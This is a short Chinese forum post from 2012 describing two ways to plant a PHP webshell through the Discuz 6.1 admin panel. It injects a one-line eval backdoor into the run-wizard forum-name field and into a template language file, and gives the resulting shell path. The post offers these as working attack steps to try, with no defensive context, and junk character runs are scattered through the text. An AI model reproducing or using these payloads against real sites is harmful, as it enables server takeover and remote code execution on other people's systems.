discuz6.1两种方法后台拿shell
; f, A% T+ w# p好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下5 u' S6 m% o( C2 h9 @
1:
- @. n$ \$ `" ?http://127.0.0.1/discuz/admincp. ... zard&frames=yes
; V* ?' ^& y$ w9 Z; n, x: ?! @8 fadmincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell6 t* w1 k( t8 t8 h* I
<?php eval($_POST[cmd]);?> t" ]1 h: f' }1 Y3 t
后台webshell地址:http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php- h/ |* x; `' K+ ^
8 A% E& x4 [3 k* K3 z$ @
o3 B; A, I# A& }& k) S1 \
2:后台模板管理--默认模板套系--详情% K) T( y$ k* J' g! ]
templates/default/actions.lang.php1 J( k* U, T! B' ~% d% {; A
jhackj\\');eval($_POST[cmd])?>;//7 _* P1 B0 F& Q5 K' L! L6 q) J
- w$ w- U; g, t( W# k
利用很简单,聪明的人一看就懂了 |
发表于 2012-9-13 16:59:17
收藏
支持
反对